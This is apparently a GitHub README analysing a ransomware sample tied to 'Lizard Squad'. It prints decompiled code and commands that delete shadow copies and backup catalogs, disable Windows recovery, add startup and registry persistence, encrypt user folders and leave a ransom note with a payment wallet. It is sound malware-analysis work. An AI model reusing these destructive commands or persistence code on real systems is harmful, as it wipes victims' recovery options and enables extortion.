Skip to content

ihl7/Lizard-Squad-Ransomware

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 

Repository files navigation

Analysis Lizard Squad Ransomware

Twitter

Hello Guys ,Today We Will Analysis Ransomware Sample That I Found On Twitter Account Tweet

Let's Dive Into It

Functions

Delete Shadow Copies

Will Execute This Command :
    "vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
For Delete Shadows copies
Code (click to expand/collapse)
Private Shared Sub DeleteShadowCopies()
    Program.runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete")
End Sub

Disable Recovery Mode

Will Execute This Command :
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
to Disable Recovery Mode This Command will Not Allow To The Victim To Use The Recovery Mode 
Code (click to expand/collapse)
Private Shared Sub DisableRecoveryMode()
    Program.runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no")
End Sub

Delete Backup Catalog

Will Execute This Command :
	"wbadmin delete catalog -quiet"
To Delete BackUp Catalog 
Code (click to expand/collapse)
Private Shared Sub DisableRecoveryMode()
    Program.runCommand("wbadmin delete catalog -quiet")
End Sub

Add Link To Startup

Make lnk File in startup 
For persistence
Code (click to expand/collapse)
Private Shared Sub AddLinkToStartup()
	Dim folderPath As String = Enviroment.GetFolderPath(Enviroment.SpecialFolder.Startup)
	Dim str As String = Process.GetCurrentProcess().ProcessName
	Using streamWriter As StreamWriter = New StreamWriter(folderPath + "\" + str + ".url")
		Dim location As String = Assembly.GetExecutingAssembly().location
		streamWriter.WriteLine("[InternetShortcut]")
		streamWriter.WriteLine("URL=file:///"+location)
		streamWriter.WriteLine("iconIndex=0")
		Dim str2 As String = location.Replace("\"c,"/"c)
		streamWriter.WriteLine("IconFile=" + str2)
		End Using
End Sub

Registry Startup

Set Registry Name Value "Microsoft Store" And Will Set Registry Value Data to The RansomWare Path 
The Key :
	"HKCU/SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
To Do persistence

look For Directories

This Function Will Look For Directories And Encrypted It
The List Of The Directories as Saved As String With User Main Dir 
  • Desktop
  • Links
  • Contacts
  • Documents
  • Downloads
  • Pictures
  • Music
  • OneDrive
  • Saved Games
  • Favorites
  • Searches
  • Videos
Code (click to expand/collapse)
Dim location As String = Program.userDir + Program.userName + "\Desktop"
Dim location2 As String = Program.userDir + Program.userName + "\Links"
Dim location3 As String = Program.userDir + Program.userName + "\Contacts"
Dim location4 As String = Program.userDir + Program.userName + "\Desktop"
Dim location5 As String = Program.userDir + Program.userName + "\Documents"
Dim location6 As String = Program.userDir + Program.userName + "\Downloads"
Dim location7 As String = Program.userDir + Program.userName + "\Pictures"
Dim location8 As String = Program.userDir + Program.userName + "\Music"
Dim location9 As String = Program.userDir + Program.userName + "\OneDrive"
Dim location10 As String = Program.userDir + Program.userName + "\Saved Games"
Dim location11 As String = Program.userDir + Program.userName + "\Favorites"
Dim location12 As String = Program.userDir + Program.userName + "\Searches"
Dim location13 As String = Program.userDir + Program.userName + "\Videos"
Program.encryptDirectory(location)
Program.encryptDirectory(location2)
Program.encryptDirectory(location3)
Program.encryptDirectory(location4)
Program.encryptDirectory(location5)
Program.encryptDirectory(location6)
Program.encryptDirectory(location7)
Program.encryptDirectory(location8)
Program.encryptDirectory(location9)
Program.encryptDirectory(location10)
Program.encryptDirectory(location11)
Program.encryptDirectory(location12)
Program.encryptDirectory(location13) 
!Dump! He Could Do It With For Loop !

Set Wallpaper

This Function Will Change The Wallpaper
To This Image :

[N|Solid

Code (click to expand/collapse)
Public Shared Sub SetWallpaper(base64 As string)
  if base64 <> "" Then
    Try
      Dim text As String = Path.GetTempPath() + Program.RandomString(9) + ".jpg"
      File.WriteAllBytes(text,Convert.FromBase64String(base64))
      Program.SystemParametersInfo(20UI, 0UI,text,1UI)
    Catch
    End Try
  End If
End Sub

Add And Open Note

This Function Will Write Message For Victim
The Name Of a File "說明it.txt" 
And The Message :
"我來自一個名為:蜥蜴小隊的國際組織", "我們是黑客組織", "我的名字是:09先生", "我會用你的電腦作為收款的抵押品", "", "請支付:USDT-TRC20", "金額:2000", "付款地址:TRZRAM9KL5qv1BMrXxo876wetHfzT19sii", "聯繫方式 :[email protected]", "電報:@woo090909", "付款後聯繫我,我會為你解鎖", "如果您不付款,您的計算機和文件將被自動銷毀,", "如果你真的想解決,請隨時支付費用,聯繫我,我會考慮給你打折", 
"I'm from an international organization called: Lizard Squad , we are a hacker group , My name is: Mr. 09 , I will use your computer as collateral for collection , Please pay: USDT-TRC20 , Amount: 2000 , Payment address: TRZRAM9KL5qv1BMrXxo876wetHfzT19sii , contact details : [email protected] , telegraph: @woo090909 , Contact me after payment and I will unlock it for you , If you do not pay, your computer and files will be automatically destroyed , If you really want a fix, feel free to pay the fee, contact me and I'll consider giving you a discount" 

Hmmm , The Name Of The Group Looks Familiar To Me : https://en.wikipedia.org/wiki/Lizard_Squad

it seems To me The Ransomware Has Been Built By Ransomware Builder Because I Found It In The source Code , there are Functions Not Used By The Ransomware Sample That I Have And I See Settings Strings Not Used

And Special Thx To @github/s4o @github/ihl7 @github/rayiilz

About

Analysis Lizard Squad Ransomware Sample

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published